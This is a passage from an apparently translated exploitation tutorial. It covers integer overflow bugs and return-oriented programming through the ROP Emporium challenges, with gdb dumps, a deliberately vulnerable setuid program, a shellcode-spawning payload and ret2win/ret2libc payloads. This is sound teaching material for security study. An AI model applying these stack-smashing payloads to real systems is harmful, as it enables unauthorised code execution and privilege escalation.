   0x0000062a <+189>:   nop
   0x0000062b <+190>:   lea    esp,[ebp-0x8]
   0x0000062e <+193>:   pop    ecx
   0x0000062f <+194>:   pop    ebx
   0x00000630 <+195>:   pop    ebp
   0x00000631 <+196>:   lea    esp,[ecx-0x4]
   0x00000634 <+199>:   ret
End of assembler dump.

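The following errors can occur during integer conversion:

Loss of value: converting to a type that cannot represent the magnitude of the value
Loss of sign: converting from a signed type to an unsigned type, so the sign is lost

Vulnerability-Prone Functions

As noted, an integer overflow only becomes useful when combined with another kind of flaw. The two functions below both take a size_t parameter, which is often misused in ways that cause an integer overflow and, in turn, a possible buffer overflow.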

#include <string.h>

void *memcpy(void *dest, const void *src, size_t n);

memcpy() copies the first n bytes starting at the address src into the array pointed to by dest, and returns dest.

#include <string.h>

char *strncpy(char *dest, const char *src, size_t n);

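strncpy() copies at most n bytes from the string at src to the memory at dest. If src is shorter than n bytes, the rest of dest is filled with null bytes; if there is no null byte among the first n bytes of src, dest is not null-terminated.

Both functions take a parameter of type size_t, the unsigned integer type of the result of the sizeof operator. On x86-32 it is typically defined as: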

typedef unsigned int size_t;

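Integer Overflow Examples

Now that we know the principle and the main forms of integer overflow, let's look at a few simple examples and then actually exploit an integer overflow vulnerability.

Examples

Example 1, integer conversion: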

char buf[80];
void vulnerable() {
    int len = read_int_from_network();
    char *p = read_string_from_network();
    if (len > 80) {
        error("length too large: bad dog, no cookie for you!");
        return;
    }
    memcpy(buf, p, len);
}

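The problem in this example is that if the attacker supplies a negative len, it passes the if check. When execution reaches memcpy(), whose third parameter has type size_t, the negative len is converted to an unsigned integer, which may be a very large positive number, so a huge amount of data is copied into buf and a buffer overflow results.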
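A short Python 3 sketch of this signed-to-unsigned conversion, assuming a 32-bit size_t. The function names are hypothetical stand-ins for the check and the implicit conversion in the C code.

```python
def to_size_t(value, bits=32):
    """Model the implicit conversion of a signed int to an unsigned size_t."""
    return value % (1 << bits)

def check_passes(length):
    """Mirror `if (len > 80) { error; return; }` evaluated on a signed int."""
    return not (length > 80)

attacker_len = -1
print(check_passes(attacker_len), hex(to_size_t(attacker_len)))
```

A length of -1 passes the signed comparison but reaches memcpy() as 0xffffffff, which is why the bound has to be checked on the unsigned value (or negative lengths rejected explicitly).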

Example 2, wraparound and overflow:

void vulnerable() {
    size_t len;
    // int len;
    char* buf;

    len = read_int_from_network();
    buf = malloc(len + 5);
    read(fd, buf, len);
    ...
}

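This example seems to avoid the buffer overflow, but if len is too large, len+5 may wrap around. For instance, on x86-32, if len = 0xFFFFFFFF then len+5 = 0x00000004, so malloc() allocates only 4 bytes, and read() then writes a large amount of data into that region, overflowing the buffer. (If len is declared as a signed int, len+5 may overflow instead.)

Example 3, truncation: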

void main(int argc, char *argv[]) {
    unsigned short int total;
    total = strlen(argv[1]) + strlen(argv[2]) + 1;
    char *buf = (char *)malloc(total);
    strcpy(buf, argv[1]);
    strcat(buf, argv[2]);
    ...
}

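This example takes two string arguments, computes their combined length, and is meant to allocate enough memory for the concatenated string. It copies the first argument into the buffer and then appends the second. If the combined length supplied by the attacker cannot be represented in total (an unsigned short), it is truncated, malloc() allocates too little memory, and the following strcpy() and strcat() overflow the buffer.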
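The allocation sizes in examples 2 and 3 can be worked out with a small Python 3 sketch. The argument lengths used for example 3 are hypothetical values picked to trigger the truncation, and a 16-bit unsigned short is assumed.

```python
def wrap(value, bits):
    """Reduce a value to an unsigned integer of the given width."""
    return value & ((1 << bits) - 1)

# Example 2: malloc(len + 5) with a 32-bit size_t
alloc_size = wrap(0xFFFFFFFF + 5, 32)

# Example 3: total = strlen(argv[1]) + strlen(argv[2]) + 1 stored in an unsigned short
len1, len2 = 40000, 25600            # hypothetical attacker-chosen lengths
total = wrap(len1 + len2 + 1, 16)

print(alloc_size, total)
```

In the second case only 65 bytes are allocated while 65601 bytes are copied.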

Hands-On

Having seen the examples above, let's actually exploit an integer overflow vulnerability. Source code:

#include<stdio.h>
#include<string.h>
void validate_passwd(char *passwd) {
    char passwd_buf[11];
    unsigned char passwd_len = strlen(passwd);
    if(passwd_len >= 4 && passwd_len <= 8) {
        printf("good!\n");
        strcpy(passwd_buf, passwd);
    } else {
        printf("bad!\n");
    }
}

int main(int argc, char *argv[]) {
    if(argc != 2) {
        printf("error\n");
        return 0;
    }
    validate_passwd(argv[1]);
}

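In the program above, strlen() returns a size_t, but the result is stored in an unsigned char. Any length greater than the maximum unsigned char value (255) is truncated to its low 8 bits. With a password of length 261, the truncated value is 5, which passes the if check and leads to a stack overflow in strcpy(). Below we exploit this overflow to get a shell.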

Compile commands:

# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -g -fno-stack-protector -z execstack vuln.c -o vuln
$ sudo chown root vuln
$ sudo chgrp root vuln
$ sudo chmod +s vuln

Disassemble the validate_passwd function with gdb.

gdb-peda$ disassemble validate_passwd
Dump of assembler code for function validate_passwd:
   0x0000059d <+0>:     push   ebp                            ; push ebp
   0x0000059e <+1>:     mov    ebp,esp
   0x000005a0 <+3>:     push   ebx                            ; push ebx
   0x000005a1 <+4>:     sub    esp,0x14
   0x000005a4 <+7>:     call   0x4a0 <__x86.get_pc_thunk.bx>
   0x000005a9 <+12>:    add    ebx,0x1a57
   0x000005af <+18>:    sub    esp,0xc
   0x000005b2 <+21>:    push   DWORD PTR [ebp+0x8]
   0x000005b5 <+24>:    call   0x430 <strlen@plt>
   0x000005ba <+29>:    add    esp,0x10
   0x000005bd <+32>:    mov    BYTE PTR [ebp-0x9],al         ; store len at [ebp-0x9]
   0x000005c0 <+35>:    cmp    BYTE PTR [ebp-0x9],0x3
   0x000005c4 <+39>:    jbe    0x5f2 <validate_passwd+85>
   0x000005c6 <+41>:    cmp    BYTE PTR [ebp-0x9],0x8
   0x000005ca <+45>:    ja     0x5f2 <validate_passwd+85>
   0x000005cc <+47>:    sub    esp,0xc
   0x000005cf <+50>:    lea    eax,[ebx-0x1910]
   0x000005d5 <+56>:    push   eax
   0x000005d6 <+57>:    call   0x420 <puts@plt>
   0x000005db <+62>:    add    esp,0x10
   0x000005de <+65>:    sub    esp,0x8
   0x000005e1 <+68>:    push   DWORD PTR [ebp+0x8]
   0x000005e4 <+71>:    lea    eax,[ebp-0x14]                ; load the address of passwd_buf
   0x000005e7 <+74>:    push   eax                           ; push passwd_buf
   0x000005e8 <+75>:    call   0x410 <strcpy@plt>
   0x000005ed <+80>:    add    esp,0x10
   0x000005f0 <+83>:    jmp    0x604 <validate_passwd+103>
   0x000005f2 <+85>:    sub    esp,0xc
   0x000005f5 <+88>:    lea    eax,[ebx-0x190a]
   0x000005fb <+94>:    push   eax
   0x000005fc <+95>:    call   0x420 <puts@plt>
   0x00000601 <+100>:   add    esp,0x10
   0x00000604 <+103>:   nop
   0x00000605 <+104>:   mov    ebx,DWORD PTR [ebp-0x4]
   0x00000608 <+107>:   leave  
   0x00000609 <+108>:   ret
End of assembler dump.

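From the disassembly we know that the buffer passwd_buf is located at ebp-0x14 (0x000005e4 <+71>: lea eax,[ebp-0x14]) and the return address at ebp+4, so the return address lies 0x18 (24) bytes past the start of the buffer. Let's test it: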

gdb-peda$ r `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
Starting program: /home/a.out `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
good!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd0f4 ('A' <repeats 24 times>, "BBBB", 'C' <repeats 172 times>...)
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd490 --> 0x534c0043 ('C')
EDX: 0xffffd1f8 --> 0xffff0043 --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd110 ('C' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd110 ('C' <repeats 200 times>...)
0004| 0xffffd114 ('C' <repeats 200 times>...)
0008| 0xffffd118 ('C' <repeats 200 times>...)
0012| 0xffffd11c ('C' <repeats 200 times>...)
0016| 0xffffd120 ('C' <repeats 200 times>...)
0020| 0xffffd124 ('C' <repeats 200 times>...)
0024| 0xffffd128 ('C' <repeats 200 times>...)
0028| 0xffffd12c ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

We can see that EIP was overwritten with BBBB, which means we control the return address. Build the following payload:

from pwn import *

ret_addr = 0xffffd118     # ebp = 0xffffd108
shellcode = shellcraft.i386.sh()

payload = "A" * 24
payload += p32(ret_addr)
payload += "\x90" * 20
payload += asm(shellcode)
payload += "C" * 169      # 24 + 4 + 20 + 44 + 169 = 261
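The arithmetic in the payload comment can be checked without pwntools. The Python 3 sketch below rebuilds the layout with placeholder bytes in place of the real shellcode (the 44-byte size is taken from the comment above, and the return address is specific to the author's machine), then confirms that the total length truncates to a value that passes the length check.

```python
import struct

BUF_TO_RET = 0x14 + 4                  # passwd_buf at ebp-0x14, return address at ebp+4
RET_ADDR = 0xffffd118                  # from the listing above; differs between systems
SHELLCODE_LEN = 44                     # size stated in the payload comment
shellcode = b"\xcc" * SHELLCODE_LEN    # placeholder bytes (int3), NOT real shellcode

payload = b"A" * BUF_TO_RET
payload += struct.pack("<I", RET_ADDR)
payload += b"\x90" * 20                # NOP sled
payload += shellcode
payload += b"C" * (261 - len(payload)) # pad to a total length of 261

passwd_len = len(payload) & 0xFF       # what the unsigned char passwd_len holds
print(len(payload), passwd_len)
```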

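3.1.4 Return-Oriented Programming (ROP)

Introduction to ROP
- Finding gadgets
- Common gadgets
ROP Emporium
- ret2win32
- ret2win
- split32
- split
- callme32
- callme
- write432
- write4
- badchars32
- badchars
- fluff32
- fluff
- pivot32
- pivot
Further reading

Introduction to ROP

Return-Oriented Programming (ROP) is an advanced memory attack technique that lets an attacker execute code in the presence of the common defenses of modern operating systems, such as non-executable memory and code signing. These attacks usually exploit a bug that corrupts the call stack, typically a buffer overflow. The attacker takes control of the call stack to hijack the program's control flow and execute chosen sequences of machine instructions (gadgets). Each gadget usually ends with a return instruction (ret, opcode c3) and lives inside a subroutine of the existing program or shared library code. By executing these sequences, the attacker controls what the program does.

The ret instruction is equivalent to pop eip: it first reads the 4 bytes that esp points to and assigns them to eip, then adds 4 to esp so that it points to the next stack slot. If the instruction sequence now executing also ends with ret, the process repeats: esp increases again and the next sequence runs.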
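The way ret chains gadgets together can be illustrated with a toy simulator in Python 3. This is only a model of the stack mechanics, not of a real CPU: the gadget addresses are hypothetical, and each gadget is described simply by the list of registers it pops before its final ret.

```python
def run_chain(stack, gadgets):
    """Simulate ret-driven execution over a list of 32-bit stack words."""
    regs = {}
    sp = 0                          # index of the word esp points to
    trace = []
    while sp < len(stack):
        eip = stack[sp]             # ret: pop eip
        sp += 1
        if eip not in gadgets:      # not a known gadget: a real program would crash here
            break
        trace.append(hex(eip))
        for reg in gadgets[eip]:    # each `pop reg` consumes one stack word
            regs[reg] = stack[sp]
            sp += 1
    return regs, trace

# Hypothetical gadgets: 0x1000 = pop eax; ret   0x2000 = pop ebx; pop ecx; ret
gadgets = {0x1000: ["eax"], 0x2000: ["ebx", "ecx"]}
stack = [0x1000, 0xb, 0x2000, 0x1, 0x2, 0xdeadbeef]
regs, trace = run_chain(stack, gadgets)
print(regs, trace)
```

The stack therefore acts as the program: addresses select gadgets, and the words between them are the data those gadgets pop.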

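Finding gadgets

Find every c3 (ret) byte in the program
Search backward to see whether the preceding bytes form valid instructions; a maximum number of bytes to search can be specified to get gadgets of different lengths
Record all the valid instruction sequences found

In theory we could find gadgets this way, but in practice many tools do the job, such as ROPgadget and Ropper. A more complete search is available at http://ropshell.com/.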
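The first two steps of the manual search can be sketched in Python 3 as follows. The sketch only collects byte windows ending in c3; deciding whether a window decodes to valid instructions needs a disassembler, which is left out. The sample bytes are those of the gadget add esp,0x8; pop ebx; ret, preceded by a made-up nop filler byte, and the base address is chosen to match that placement.

```python
def ret_candidates(code, base=0, max_back=4):
    """Yield (address, bytes) windows that end in a ret (0xc3) byte."""
    for i, byte in enumerate(code):
        if byte != 0xC3:
            continue
        for back in range(1, max_back + 1):   # look at 1..max_back preceding bytes
            start = i - back
            if start < 0:
                break
            yield base + start, code[start:i + 1]

code = bytes.fromhex("9083c4085bc3")          # nop (filler); add esp,0x8; pop ebx; ret
found = dict(ret_candidates(code, base=0x08048575))
for addr, window in sorted(found.items()):
    print(hex(addr), window.hex())
```

Note that a single ret yields several candidates of different lengths, such as 5bc3 (pop ebx; ret) inside the longer gadget.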

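Common gadgets

Gadgets can do just about anything you can think of. A few typical uses:

Load stack data into a register
- Pops the value at the top of the stack into a register and then jumps to the address at the new top of the stack. So when the return address is overwritten with the address of a gadget, the program executes that instruction sequence after returning.
- e.g. pop eax; ret
Load memory data into a register
- Loads the data at a memory address into a register.
- e.g. mov ecx,[eax]; ret
Store register data to memory
- Saves the value of a register to a memory address.
- e.g. mov [eax],ecx; ret
Arithmetic and logic operations
- add, sub, mul, xor, and so on.
- e.g. add eax,ebx; ret, xor edx,edx; ret
System calls
- Trigger a kernel interrupt
- e.g. int 0x80; ret, call gs:[0x10]; ret
Gadgets that affect the stack frame
- These gadgets change the value of ebp and therefore the stack frame; operations such as a stack pivot need them to move the stack frame.
- e.g. leave; ret, pop ebp; ret

ROP Emporium

ROP Emporium provides a series of challenges for learning ROP. Each challenge introduces one concept and the difficulty increases gradually, making it good material for learning ROP step by step. Another feature is its focus on ROP: all challenges share the same vulnerability and differ only in how the ROP chain must be built, so no other exploitation or reverse engineering is involved. Each challenge comes as both a 32-bit and a 64-bit binary; comparing them helps us understand how ROP chains differ between architectures, for example in argument passing. In this article we learn from these challenges.

Each challenge includes a flag.txt file, and our goal is to print its contents by controlling program execution. You can of course also try to get a shell.

Download the files

ret2win32

For a program with a buffer overflow, we usually first input enough characters to fill the buffer, followed by a carefully crafted ROP chain, and redirect execution by overwriting the return address saved on the stack (for buffer overflows, see the previous chapter, 3.1.3 Stack Overflow).

I will go into as much detail as I can for the first challenge, because all the challenge binaries have a similar structure and the same buffer size. Let's look at the vulnerable function: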

gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
   0x080485f6 <+0>:     push   ebp
   0x080485f7 <+1>:     mov    ebp,esp
   0x080485f9 <+3>:     sub    esp,0x28
   0x080485fc <+6>:     sub    esp,0x4
   0x080485ff <+9>:     push   0x20
   0x08048601 <+11>:    push   0x0
   0x08048603 <+13>:    lea    eax,[ebp-0x28]
   0x08048606 <+16>:    push   eax
   0x08048607 <+17>:    call   0x8048460 <memset@plt>
   0x0804860c <+22>:    add    esp,0x10
   0x0804860f <+25>:    sub    esp,0xc
   0x08048612 <+28>:    push   0x804873c
   0x08048617 <+33>:    call   0x8048420 <puts@plt>
   0x0804861c <+38>:    add    esp,0x10
   0x0804861f <+41>:    sub    esp,0xc
   0x08048622 <+44>:    push   0x80487bc
   0x08048627 <+49>:    call   0x8048420 <puts@plt>
   0x0804862c <+54>:    add    esp,0x10
   0x0804862f <+57>:    sub    esp,0xc
   0x08048632 <+60>:    push   0x8048821
   0x08048637 <+65>:    call   0x8048400 <printf@plt>
   0x0804863c <+70>:    add    esp,0x10
   0x0804863f <+73>:    mov    eax,ds:0x804a060
   0x08048644 <+78>:    sub    esp,0x4
   0x08048647 <+81>:    push   eax
   0x08048648 <+82>:    push   0x32
   0x0804864a <+84>:    lea    eax,[ebp-0x28]
   0x0804864d <+87>:    push   eax
   0x0804864e <+88>:    call   0x8048410 <fgets@plt>
   0x08048653 <+93>:    add    esp,0x10
   0x08048656 <+96>:    nop
   0x08048657 <+97>:    leave  
   0x08048658 <+98>:    ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
   0x08048659 <+0>:     push   ebp
   0x0804865a <+1>:     mov    ebp,esp
   0x0804865c <+3>:     sub    esp,0x8
   0x0804865f <+6>:     sub    esp,0xc
   0x08048662 <+9>:     push   0x8048824
   0x08048667 <+14>:    call   0x8048400 <printf@plt>
   0x0804866c <+19>:    add    esp,0x10
   0x0804866f <+22>:    sub    esp,0xc
   0x08048672 <+25>:    push   0x8048841
   0x08048677 <+30>:    call   0x8048430 <system@plt>
   0x0804867c <+35>:    add    esp,0x10
   0x0804867f <+38>:    nop
   0x08048680 <+39>:    leave  
   0x08048681 <+40>:    ret
End of assembler dump.

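The function pwnme() contains the buffer overflow. It calls fgets() with a size of 0x32 (50) to read arbitrary data, but the buffer starts only 40 bytes below ebp (0x0804864a <+84>: lea eax,[ebp-0x28], 0x28=40). Input longer than 40 bytes therefore overwrites the caller's saved ebp and the return address: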

gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win32/ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EBX: 0x0
ECX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EDX: 0xf7f90860 --> 0x0
ESI: 0xf7f8ee28 --> 0x1d1d30
EDI: 0x0
EBP: 0x41304141 ('AA0A')
ESP: 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
EIP: 0x41414641 ('AFAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414641
[------------------------------------stack-------------------------------------]
0000| 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
0004| 0xffffd5f4 --> 0xffffd610 --> 0x1
0008| 0xffffd5f8 --> 0x0
0012| 0xffffd5fc --> 0xf7dd57c3 (<__libc_start_main+243>:       add    esp,0x10)
0016| 0xffffd600 --> 0xf7f8ee28 --> 0x1d1d30
0020| 0xffffd604 --> 0xf7f8ee28 --> 0x1d1d30
0024| 0xffffd608 --> 0x0
0028| 0xffffd60c --> 0xf7dd57c3 (<__libc_start_main+243>:       add    esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414641 in ?? ()
gdb-peda$ pattern_offset $ebp
1093681473 found at offset: 40
gdb-peda$ pattern_offset $eip
1094796865 found at offset: 44

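The offsets from the buffer to the saved ebp and to the return address (eip) are 40 and 44, which confirms our assumption.

Looking at the program logic, the function ret2win() exists in the .text section but is never called during execution. All we need to do is overwrite the return address with the address of this function so that the program jumps into it and prints the flag. This kind of ROP is called ret2text.

Another important step is checksec: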

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

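NX is enabled and PIE is disabled here, so the load address of .text does not change and we can use the address of ret2win(), 0x08048659, directly.

The payload is as follows (note: the payloads in this article are written in several different ways to show the use of various tools):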

$ python2 -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
...
> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}
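For readers without Python 2, the same payload can be assembled in Python 3 with the standard struct module. This is just an equivalent sketch of the one-liner above; the constants come from the pattern_offset result and the disassembly of ret2win().

```python
import struct

OFFSET_TO_RET = 44        # from `pattern_offset $eip`
RET2WIN = 0x08048659      # address of ret2win()

# "<I" packs a 32-bit value in little-endian byte order, as x86 expects.
payload = b"A" * OFFSET_TO_RET + struct.pack("<I", RET2WIN)
print(payload)
```

Written to a file or pipe with a trailing newline, these bytes play the same role as the output of the python2 command.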

ret2win

Now the 64-bit program:

gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
   0x00000000004007b5 <+0>:     push   rbp
   0x00000000004007b6 <+1>:     mov    rbp,rsp
   0x00000000004007b9 <+4>:     sub    rsp,0x20
   0x00000000004007bd <+8>:     lea    rax,[rbp-0x20]
   0x00000000004007c1 <+12>:    mov    edx,0x20
   0x00000000004007c6 <+17>:    mov    esi,0x0
   0x00000000004007cb <+22>:    mov    rdi,rax
   0x00000000004007ce <+25>:    call   0x400600 <memset@plt>
   0x00000000004007d3 <+30>:    mov    edi,0x4008f8
   0x00000000004007d8 <+35>:    call   0x4005d0 <puts@plt>
   0x00000000004007dd <+40>:    mov    edi,0x400978
   0x00000000004007e2 <+45>:    call   0x4005d0 <puts@plt>
   0x00000000004007e7 <+50>:    mov    edi,0x4009dd
   0x00000000004007ec <+55>:    mov    eax,0x0
   0x00000000004007f1 <+60>:    call   0x4005f0 <printf@plt>
   0x00000000004007f6 <+65>:    mov    rdx,QWORD PTR [rip+0x200873]        # 0x601070 <stdin@@GLIBC_2.2.5>
   0x00000000004007fd <+72>:    lea    rax,[rbp-0x20]
   0x0000000000400801 <+76>:    mov    esi,0x32
   0x0000000000400806 <+81>:    mov    rdi,rax
   0x0000000000400809 <+84>:    call   0x400620 <fgets@plt>
   0x000000000040080e <+89>:    nop
   0x000000000040080f <+90>:    leave  
   0x0000000000400810 <+91>:    ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
   0x0000000000400811 <+0>:     push   rbp
   0x0000000000400812 <+1>:     mov    rbp,rsp
   0x0000000000400815 <+4>:     mov    edi,0x4009e0
   0x000000000040081a <+9>:     mov    eax,0x0
   0x000000000040081f <+14>:    call   0x4005f0 <printf@plt>
   0x0000000000400824 <+19>:    mov    edi,0x4009fd
   0x0000000000400829 <+24>:    call   0x4005e0 <system@plt>
   0x000000000040082e <+29>:    nop
   0x000000000040082f <+30>:    pop    rbp
   0x0000000000400830 <+31>:    ret
End of assembler dump.

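The first difference from 32-bit is argument passing: a 64-bit program passes the first six arguments in RDI, RSI, RDX, RCX, R8, and R9. So fgets() receives the buffer address in rdi (lea rax,[rbp-0x20]; mov rdi,rax), the size 0x32 in esi, and stdin in rdx; the buffer is 32 bytes.

Moreover, because the overwritten return address is not a valid address, the program stops at => 0x400810 <pwnme+91>: ret. A usable 64-bit user-space address cannot be greater than 0x00007fffffffffff; otherwise an exception is raised.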

gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win/ret2win
ret2win by ROP Emporium
64bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBX: 0x0
RCX: 0x1f
RDX: 0x7ffff7dd4710 --> 0x0
RSI: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RDI: 0x7fffffffe401 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe428 ("AA0AAFAAb")
RIP: 0x400810 (<pwnme+91>:      ret)
R8 : 0x0
R9 : 0x7ffff7fb94c0 (0x00007ffff7fb94c0)
R10: 0x602260 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
R11: 0x246
R12: 0x400650 (<_start>:        xor    ebp,ebp)
R13: 0x7fffffffe510 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400809 <pwnme+84>: call   0x400620 <fgets@plt>
   0x40080e <pwnme+89>: nop
   0x40080f <pwnme+90>: leave  
=> 0x400810 <pwnme+91>: ret
   0x400811 <ret2win>:  push   rbp
   0x400812 <ret2win+1>:        mov    rbp,rsp
   0x400815 <ret2win+4>:        mov    edi,0x4009e0
   0x40081a <ret2win+9>:        mov    eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe428 ("AA0AAFAAb")
0008| 0x7fffffffe430 --> 0x400062 --> 0x1f8000000000000
0016| 0x7fffffffe438 --> 0x7ffff7a41f6a (<__libc_start_main+234>:       mov    edi,eax)
0024| 0x7fffffffe440 --> 0x0
0032| 0x7fffffffe448 --> 0x7fffffffe518 --> 0x7fffffffe870 ("/home/firmy/Desktop/rop_emporium/ret2win/ret2win")
0040| 0x7fffffffe450 --> 0x100000000
0048| 0x7fffffffe458 --> 0x400746 (<main>:      push   rbp)
0056| 0x7fffffffe460 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400810 in pwnme ()
gdb-peda$ pattern_offset $rbp
7007954260868540737 found at offset: 32
gdb-peda$ pattern_offset AA0AAFAAb
AA0AAFAAb found at offset: 40
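Why the fault is reported at ret rather than at the overwritten address can be checked in Python 3. The sketch decodes the 8 bytes sitting at the return address slot (the first 8 characters of the string at RSP) and compares the result with the user-space limit quoted above; the helper name is illustrative.

```python
import struct

USER_MAX = 0x00007fffffffffff     # upper limit for user-space addresses, as stated above

def is_user_address(addr):
    return 0 <= addr <= USER_MAX

# The return address slot holds the pattern bytes "AA0AAFAA" (little-endian).
overwritten = struct.unpack("<Q", b"AA0AAFAA")[0]
print(hex(overwritten), is_user_address(overwritten))
print(hex(0x400811), is_user_address(0x400811))
```

The pattern bytes decode to an address above the limit, so ret itself faults, whereas the address of ret2win() is accepted.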

The address of ret2win() is 0x0000000000400811, and the payload is as follows:

from zio import *

payload = "A"*40 + l64(0x0000000000400811)

io = zio('./ret2win')
io.writeline(payload)
io.read()

split32

This challenge is also ret2text, but this time what we have is a usefulFunction() function:

gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
   0x08048649 <+0>:     push   ebp
   0x0804864a <+1>:     mov    ebp,esp
   0x0804864c <+3>:     sub    esp,0x8
   0x0804864f <+6>:     sub    esp,0xc
   0x08048652 <+9>:     push   0x8048747
   0x08048657 <+14>:    call   0x8048430 <system@plt>
   0x0804865c <+19>:    add    esp,0x10
   0x0804865f <+22>:    nop
   0x08048660 <+23>:    leave  
   0x08048661 <+24>:    ret
End of assembler dump.

It calls system(), and what we need to do is pass it an argument whose execution prints the flag.

Use rabin2, a tool from radare2, to search for strings in the .data section:

$ rabin2 -z split32
...
vaddr=0x0804a030 paddr=0x00001030 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt

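We find the string /bin/cat flag.txt, which is exactly what we need, at address 0x0804a030.

Next we build the payload. There are two ways: one jumps directly to the call system instruction at 0x08048657, the other uses the PLT address of system(), 0x8048430. We covered the lazy binding mechanism of the PLT in an earlier chapter (1.5.6 Dynamic Linking); let's review it here:

Before binding: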

gdb-peda$ disassemble system
Dump of assembler code for function system@plt:
   0x08048430 <+0>:     jmp    DWORD PTR ds:0x804a018
   0x08048436 <+6>:     push   0x18
   0x0804843b <+11>:    jmp    0x80483f0
gdb-peda$ x/5x 0x804a018  
0x804a018:      0x08048436      0x08048446      0x08048456      0x08048466
0x804a028:      0x00000000

After binding:

gdb-peda$ disassemble system
Dump of assembler code for function system:
   0xf7df9c50 <+0>:     sub    esp,0xc
   0xf7df9c53 <+3>:     mov    eax,DWORD PTR [esp+0x10]
   0xf7df9c57 <+7>:     call   0xf7ef32cd <__x86.get_pc_thunk.dx>
   0xf7df9c5c <+12>:    add    edx,0x1951cc
   0xf7df9c62 <+18>:    test   eax,eax
   0xf7df9c64 <+20>:    je     0xf7df9c70 <system+32>
   0xf7df9c66 <+22>:    add    esp,0xc
   0xf7df9c69 <+25>:    jmp    0xf7df9700 <do_system>
   0xf7df9c6e <+30>:    xchg   ax,ax
   0xf7df9c70 <+32>:    lea    eax,[edx-0x57616]
   0xf7df9c76 <+38>:    call   0xf7df9700 <do_system>
   0xf7df9c7b <+43>:    test   eax,eax
   0xf7df9c7d <+45>:    sete   al
   0xf7df9c80 <+48>:    add    esp,0xc
   0xf7df9c83 <+51>:    movzx  eax,al
   0xf7df9c86 <+54>:    ret
End of assembler dump.
gdb-peda$ x/5x 0x08048430
0x8048430 <system@plt>: 0xa01825ff      0x18680804      0xe9000000      0xffffffb0
0x8048440 <__libc_start_main@plt>:      0xa01c25ff

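Strictly speaking, this is not the best place to discuss the PLT: system is used so often that it is already bound by the time we use it. We will meet the unbound case in later challenges.

The two payloads are as follows: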

$ python2 -c "print 'A'*44 + '\x57\x86\x04\x08' + '\x30\xa0\x04\x08'" | ./split32
...
> ROPE{a_placeholder_32byte_flag!}

from zio import *

payload  = "A"*44
payload += l32(0x08048430)
payload += "BBBB"
payload += l32(0x0804a030)

io = zio('./split32')
io.writeline(payload)
io.read()

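Note that "BBBB" is the new return address: when the called function executes ret, it jumps to "BBBB". Usually the address of a gadget such as pop;pop;ret is placed here to balance the stack. The disassembly of system() shows the same layout: it first subtracts 0xc from esp and then reads the value at esp+0x10, which is the word right after "BBBB", that is, the address of the string. Because system() is a function in libc, this technique is called ret2libc.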
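The stack layout described here (target function, fake return address, arguments) can be captured in a small Python 3 helper. The names p32 and call32 are local helpers defined for this sketch, not library functions; the addresses are the ones used in the zio payload above.

```python
import struct

def p32(value):
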